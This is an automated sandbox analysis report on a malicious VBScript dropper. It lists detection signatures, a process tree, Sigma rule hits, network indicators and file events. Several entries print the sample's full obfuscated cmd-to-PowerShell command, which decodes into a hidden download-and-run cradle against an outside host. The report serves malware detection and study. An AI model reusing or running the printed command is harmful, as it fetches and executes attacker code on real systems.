Windows Analysis Report
analysis.vbs

Overview

General Information

Sample name: analysis.vbs
Analysis ID: 1607480
MD5: f88fb28db55f790656578d4fa2a18281
SHA1: 6c14e47dbc336247d467a3fa9c77ec7ffa2450b1
SHA256: 834024ad5c7dd595bcb62b79d6a13dc654cbe0805e8e29dba9a3590834a576ba
Tags: vbs, user-qqw

Detection

Score: 84
Range: 0 - 100
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Joe Sandbox ML detected suspicious sample
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Classification chart categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (scale: clean, suspicious, malicious)
  • System is w10x64
  • wscript.exe (PID: 5608 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 320 cmdline: "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5780 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 6464 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Network Connection; Author: frack113, Florian Roth; Data: DestinationIp: 149.56.240.127, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5608, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs", ProcessId: 5608, ProcessName: wscript.exe
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", CommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); 
$((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265
Source: Network Connection; Author: frack113; Data: DestinationIp: 149.56.240.127, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5608, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs", ProcessId: 5608, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, CommandLine|base64offset|contains: hv, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-
284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 320, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -, ProcessId: 6464, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 91.2% probability
Source: unknown; HTTPS traffic detected: 149.56.240.127:443 -> 192.168.2.5:49704 version: TLS 1.2

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: C:\Windows\System32\wscript.exe; Network Connect: 149.56.240.127 443
Source: global traffic; TCP traffic: 192.168.2.5:49705 -> 45.93.9.167:15322
Source: Joe Sandbox View; IP Address: 149.56.240.127 149.56.240.127
Source: Joe Sandbox View; JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic; HTTP traffic detected: GET /stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1; Accept: */*; Accept-Language: en-ch; UA-CPU: AMD64; Accept-Encoding: gzip, deflate; User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729); Host: s4.histats.com; Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: s4.histats.com
Source: global traffic; DNS traffic detected: DNS query: host85500.info
Source: wscript.exe, 00000000.00000002.2157512064.0000021328E53000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.cot
Source: wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://histats.com/d_opened
Source: wscript.exe, 00000000.00000002.2157235442.0000021326F35000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://histats.com/d_opened-
Source: wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://histats.com/d_openedP
Source: wscript.exe, 00000000.00000002.2157512064.0000021328E53000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://histats.com/d_openedh
Source: wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://histats.com/d_openedjg
Source: wscript.exe, 00000000.00000003.2156569055.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155775019.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156362022.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156423007.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157099379.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://histats.com/d_openedl
Source: wscript.exe, 00000000.00000003.2155460887.0000021328D82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328D87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155993130.0000021328D87000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://histats.com/d_openedw2
Source: wscript.exe, 00000000.00000003.2155993130.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155460887.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://s4.hista
Source: wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://s4.histatl2
Source: wscript.exe, 00000000.00000003.2155993130.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155460887.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://s4.histats.com/C
Source: wscript.exe, 00000000.00000003.2155993130.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155460887.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://s4.histats.com/o
Source: wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://s4.histats.com/s
Source: wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://s4.histats.com/st
Source: wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://s4.histats.com/stats/0.php?4926118&
Source: wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://s4.histav2
Source: unknown; Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown; HTTPS traffic detected: 149.56.240.127:443 -> 192.168.2.5:49704 version: TLS 1.2

System Summary

Source: C:\Windows\System32\wscript.exe; COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: analysis.vbs; Initial sample: Strings found which are bigger than 50
Source: classification engine; Classification label: mal84.expl.evad.winVBS@8/5@2/2
Source: C:\Windows\System32\wscript.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\0[1].htm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6620:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ime1wocq.hyz.ps1
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs"
Source: C:\Windows\System32\wscript.exe; File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown; Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\analysis.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) "
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,